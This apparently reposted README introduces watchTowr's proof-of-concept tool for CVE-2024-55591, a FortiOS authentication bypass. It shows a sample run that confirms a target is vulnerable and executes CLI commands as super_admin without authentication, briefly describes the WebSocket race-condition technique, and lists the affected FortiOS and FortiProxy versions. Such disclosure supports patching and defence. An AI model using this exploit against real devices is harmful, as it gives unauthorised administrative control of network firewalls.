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CVE-2024-55591

A Fortinet FortiOS Authentication Bypass Proof of Concept

See our blog post for technical details

Detection in Action

root@kitploit:~
python CVE-2024-55591-PoC.py --host 192.168.1.5 --port 443 --command "get system status" --user watchTowr --ssl
             __         ___  ___________                   
     __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________ 
     \ \/ \/ \__  \    ___/ ___\|  |  \\|    | /  _ \ \/ \/ \_  __ \
      \     / / __ \|  | \  \\___|   Y  |    |(  <_> \     / |  | \
       \/\_/ (____  |__|  \\\\___  |___|__|__  | \\__  / \\/\_/  |__|   
                  \\          \\     \\                              

        CVE-2024-55591.py
        (*) Fortinet FortiOS Authentication Bypass (CVE-2024-55591) POC by watchTowr
        
          - Sonny , watchTowr ([email protected])

        CVEs: [CVE-2024-55591]

[*] Checking if target is a FortiOS Management interface
[*] Target is confirmed as a FortiOS Management interface
[*] Target is confirmed as vulnerable to CVE-2024-55591, proceeding with exploitation
Output from server: �m"watchTowr" "admin" "watchTowr" "super_admin" "watchTowr" "watchTowr" [13.37.13.37]:1337 [13.37.13.37]:1337

Output from server: �
get system status

Output from server: �~�FAKESERIAL # "Local_Process_Access" "Local_Process_Access" "root" "" "" "none" [x.x.x.x]:54546 [x.x.x.x]:443
Unknown action 0

FAKESERIAL # 
FAKESERIAL # get system status
Version: FortiGate-VM64-AWS v7.0.16,build0667,241001 (GA.M)
Security Level: High
Firmware Signature: certified
Virus-DB: 1.00000(2018-04-09 18:07)

Description

This script is a proof of concept for CVE-2024-55591, targeting FortiOS (Fortigate) management interfaces. By creating brute forcing WebSocket connections to create a race condition along with an authentication bypass, it is possible to send FortiOS CLI commands unauthenticated. More details are described within our [blog post] (https://labs.watchtowr.com/).

Affected Versions

  • FortiOS 7.0.0 through 7.0.16
  • FortiProxy 7.0.0 through 7.0.19
  • FortiProxy 7.2.0 through 7.2.12

More details at Fortinet advisory

Note

This script isn't designed to work with FortiProxy, as pre-flight checks determine if the instance is a FortiGate Management Interface, but it is assumed the underlying technique is applicable to affected FortiProxy devices.

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